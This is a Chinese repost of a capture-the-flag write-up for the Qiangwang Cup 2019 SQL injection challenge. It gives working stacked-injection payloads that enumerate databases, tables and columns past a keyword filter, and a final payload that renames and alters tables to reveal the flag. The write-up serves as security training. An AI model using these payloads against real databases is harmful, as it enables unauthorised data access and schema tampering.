首页
/
每日頭條
/
生活
/
sql注入漏洞原理與利用
sql注入漏洞原理與利用
更新时间:2026-06-20 22:18:03
[強網杯 2019] 随便注

每天學習網絡安全知識,本文記錄強網杯的一個SQL注入題。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)1

使用單引号測試,發現頁面報錯,說明此處存在SQL注入漏洞。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)2

1' 1''

sql注入漏洞原理與利用(黑客必會之SQL注入學習)3

既然此處存在漏洞,那麼我們就走正常流程測試下,如果不知道SQL注入正常流程的可以去看下我的sqllibs注入教程。

1.猜字段數

1' order by 3# 1' order by 2#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)4

sql注入漏洞原理與利用(黑客必會之SQL注入學習)5

使用第一個payload測試的時候發現頁面報錯,再使用第二個payload時發現頁面顯示正常,因此我們可以得知當前數據庫當前表存在2個字段。這時候嘗試union select進行聯合查詢。

2.使用聯合查詢

sql注入漏洞原理與利用(黑客必會之SQL注入學習)6

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

發現頁面提示過濾了許多關鍵的命令,看來需要一些騷操作了。

3.嘗試堆疊注入

1';show databases#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)7

發現成功爆出所有數據庫。使用show tables;試試看看能不能得到表名

-1';show tables#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)8

成功爆出當前數據庫的兩個表名;嘗試查詢表中的字段

0';show columns from `1919810931114514`;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)9

發現有一個flag字段,接下來就是嘗試讀取flag。

4. 再查看words表的結構

0';desc words;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)10

可以猜測我們提交查詢的窗口就是在這個表裡查詢數據的。

5. 那麼查詢語句很有可能是 : selsect id,data from words where id =

然後1919810931114514隻有一個flag字段這時候雖然有強大的正則過濾,但沒有過濾alert和rename關鍵字這時候我們就可以已下面的騷姿勢進行注入:1.将words表改名為word1或其它任意名字2.1919810931114514改名為words3.将新的word表插入一列,列名為id4.将flag列改名為data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)11

成功拿到flag。

,
Comments
Welcome to tft每日頭條 comments! Please keep conversations courteous and on-topic. To fosterproductive and respectful conversations, you may see comments from our Community Managers.
Sign up to post
Sort by
Show More Comments
推荐阅读
溫暖的文字最能直抵人心
溫暖的文字最能直抵人心
1.我于昨晚去世,走時心如止水;我于今早重生,來時心懷溫暖。2.從黎明到黃昏,陽光充足,勝過一切過去的3.因為你是朵花,才會覺得春天離開你。如果你是春天。就沒有離開,就永遠有花。4.一塵不染不是沒有塵埃,而是塵埃任它飛揚,我自做我的陽光。5...
2026-06-20
名言大全
名言大全
名言大全?1.生活确實很艱難,讓我們常常無力抵抗,但我們不妨換個心态,換種心情,給自己減負,為生活發一塊糖,下面我們就來聊聊關于名言大全?接下來我們就一起去了解一下吧!名言大全1.生活确實很艱難,讓我們常常無力抵抗,但我們不妨換個心态,換種...
2026-06-20
環太平洋中的怪獸排行
環太平洋中的怪獸排行
斧首級别:未分級身高:92米體重:2700噸毒性:中攻擊地點:舊金山“斧首”是第一個被核彈幹掉的怪獸斧首是環太平洋中出現的第一個怪獸,也是唯一一個未分級的怪獸。因為人類對怪獸一無所知,普通武器難傷怪獸分毫,所以斧首非常輕松地就摧毀了舊金山,...
2026-06-20
即日起上調金紅石型及銳钛型钛白粉售價
即日起上調金紅石型及銳钛型钛白粉售價
即日起上調金紅石型及銳钛型钛白粉售價?中證網訊(記者宋維東)金浦钛業(000545)1月6日晚公告稱,根據目前國内外钛白粉市場情況并結合公司實際,公司價格委員會研究決定:自即日起,公司金紅石型及銳钛型钛白粉銷售價格在原價基礎上,對國内各類客...
2026-06-20
荒天帝和葉凡
荒天帝和葉凡
​辰東不愧是網文界的“坑神”,一個大坑從遮天開始挖,而且越挖越大,挖了一整部遮天,最後不僅沒有填,而且又把坑升級了,原來仙界隻是很小的一個領域。再到完美世界,關于整個大恐怖的源頭,辰東随着遮天的坑,又繼續挖,終于挖到了界海,甚至連仙帝都出來...
2026-06-20
Copyright 2023-2026 - www.tftnews.com All Rights Reserved